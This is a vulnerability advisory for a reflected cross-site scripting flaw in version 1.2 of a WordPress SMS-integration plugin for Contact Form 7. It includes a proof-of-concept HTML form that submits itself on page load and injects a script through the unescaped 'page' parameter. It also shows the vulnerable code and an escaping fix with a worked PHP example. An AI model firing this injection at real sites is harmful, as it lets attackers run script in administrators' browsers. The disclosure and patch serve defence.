___________________________________________________
|
| Exploit Title: WordPress Contact Form 7 International Sms Integration Plugin Cross-Site Scripting
| Exploit Author: Ashiyane Digital Security Team
| Vendor Homepage : https://wordpress.org/plugins/cf7-international-sms-integration/
| Software Link: https://downloads.wordpress.org/plugin/cf7-international-sms-integration.1.2.zip
| Version: 1.2
| Date: 2017 - 07 - 9
| Tested on: Kali Linux / Firefox
|__________________________________________________
Exploit :
<html>
<body onload="document.exploit.submit()">
<form id="smslog-filter" method="get" action="http://Target/PATH/wp-content/plugins/
cf7-international-sms-integration/includes/admin/class-sms-log-display.php ">
<input type="hidden" name="page" value=""/><script>alert(1)</script>" />
<input type="hidden" name="tab" value="smslogs" />
</form>
</body>
</html>
__________________________________________________
Vulnerable method :
$_GET
Vulnerable File :
wp-content/plugins/cf7-international-sms-integration/includes/admin/class-sms-log-display.php
Vulnerable code:
line 366 :
<form id="smslog-filter" method="get" action="<?php echo $current_url; ?> ">
<input type="hidden" name="page" value="<?php echo $_REQUEST['page'] ?>" />
<input type="hidden" name="tab" value="smslogs" />
<?php $testListTable->display() ?>
</form>
__________________________________________________
#patch:
To fix this vulnerability, pass $_REQUEST['page'] through the htmlspecialchars() function before echoing it into the form.
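
The htmlspecialchars() fix applied to the hidden "page" field, shown beside the unescaped pattern from line 366. This is an added example, not the plugin's code: the function names and the sample request values are assumptions made for illustration.

```php
<?php
// Added example: not the plugin's code. Both function names are hypothetical.

// Vulnerable pattern from the advisory (line 366): the request value is
// concatenated into the attribute unchanged, so a '"' ends the attribute.
function render_page_field_unescaped(array $request): string
{
    return '<input type="hidden" name="page" value="' . ($request['page'] ?? '') . '" />';
}

// Hardened form: escape for the HTML attribute context at output time.
function render_page_field(array $request): string
{
    // page[]=x arrives as an array; treat anything that is not a string as empty.
    $page = $request['page'] ?? '';
    if (!is_string($page)) {
        $page = '';
    }
    // ENT_QUOTES encodes both " and ' (before PHP 8.1 the default flag is
    // ENT_COMPAT, which leaves ' alone). ENT_SUBSTITUTE keeps invalid UTF-8
    // from turning the whole value into an empty string.
    $safe = htmlspecialchars($page, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="page" value="' . $safe . '" />';
}

// Constructed sample requests; the markup value is the one used in the advisory.
$samples = [
    'benign'  => ['page' => 'sms-logs'],
    'markup'  => ['page' => '"/><script>alert(1)</script>'],
    'array'   => ['page' => ['x']],
    'missing' => [],
];

foreach ($samples as $label => $request) {
    $html = render_page_field($request);
    // A correctly escaped field never contains a raw tag opener from the input.
    $ok = strpos($html, '<script') === false ? 'ok' : 'UNSAFE';
    printf("%-8s %-6s %s\n", $label, $ok, $html);
}
```

Inside WordPress code, esc_attr() is the core helper for this attribute context.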
__________________________________________________
Discovered By : M.R.S.L.Y
__________________________________________________